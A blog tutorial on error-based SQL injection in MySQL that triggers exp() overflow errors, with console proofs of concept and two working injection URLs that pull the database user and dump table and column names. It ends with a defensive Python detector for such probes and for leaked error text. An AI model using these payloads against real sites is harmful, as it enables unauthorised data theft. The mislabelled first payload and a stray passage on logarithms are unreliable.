Error Based SQL Injection With Exponential Method

Hello guys, in the previous post I covered basic error-based SQL injection; in this post I will cover error-based SQL injection with the exponential method and mathematical operations. Looking at the functions in MySQL, I was interested in the mathematical functions. They too must use some data type to hold their values. So I went on testing for functions that would cause overflow errors, and I found that exp() causes an overflow error when we pass a large value above 709.

POC 1:

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp function is the opposite of MySQL's log functions. To briefly explain their functionality: log and ln both return the natural logarithm, that is, the logarithm to the base e. In common, e is approximated to:

POC 2:

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

Exponentials are the opposite of logarithms. The exp function would do the exact opposite for us.

Injection:

  • Extracting database name
    http://127.0.0.1/?id=1' or exp(~(select*from(select user())x))-- -
  • Extracting table name and column name in one shot
    http://127.0.0.1/?id=1' or exp(~(select * from(select group_concat('<li>',table_name,'::::',column_name) from information_schema.columns where table_schema=database())x))-- -

Yeah, we are done: we injected using the exponential method.
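For the defending side, an added example (not part of the original post): a Python check that flags the exp() overflow pattern shown above in web request lines and reports when MySQL's overflow error text is echoed in a response body. The sample request lines, the function names and the three-round decoding limit are assumptions made for this example.

```python
import math
import re
import sys
from urllib.parse import unquote_plus

# ln(DBL_MAX), about 709.78: exp() of anything larger overflows a double,
# which is why exp(709) returns a value and exp(710) raises ERROR 1690.
EXP_LIMIT = math.log(sys.float_info.max)

COMMENT = re.compile(r"/\*.*?\*/", re.S)  # MySQL treats /* ... */ as whitespace
EXP_ARG = re.compile(r"(?<![a-z0-9_])exp\s*\(\s*(~|-?\d+(?:\.\d+)?)")

# Constructed request lines; the second is the page's first payload, URL-encoded.
SAMPLE_REQUESTS = [
    "GET /?id=1 HTTP/1.1",
    "GET /?id=1%27%20or%20exp(~(select*from(select%20user())x))--%20- HTTP/1.1",
    "GET /?id=1%2527+or+EXP%2528710%2529 HTTP/1.1",  # double-encoded
    "GET /calc?f=exp(2) HTTP/1.1",                    # benign use of exp()
]

def normalize(raw: str) -> str:
    """Undo up to three layers of URL encoding, then drop case, comments, extra spaces."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", COMMENT.sub(" ", text.lower()))

def request_findings(request: str) -> list[str]:
    """Reasons a request looks like an exp() overflow probe; empty list means none."""
    text, found = normalize(request), []
    for arg in EXP_ARG.findall(text):
        if arg == "~":
            found.append("exp() applied to a bitwise-NOT expression")
        elif float(arg) > EXP_LIMIT:
            found.append(f"exp() constant {arg} exceeds {EXP_LIMIT:.2f}")
    if found and "select" in text:
        found.append("subquery alongside exp()")
    return found

def error_reaches_client(body: str) -> bool:
    """True when a response body echoes MySQL's overflow error text to the user."""
    return "DOUBLE value is out of range in" in body

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(request_findings(line) or "clean", "<-", line)
```

A hit from error_reaches_client means database errors are being shown to users; returning a generic error page and using parameterized queries removes both the leak channel and the injection point.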

Thanks for reading, guys. Keep learning 😉
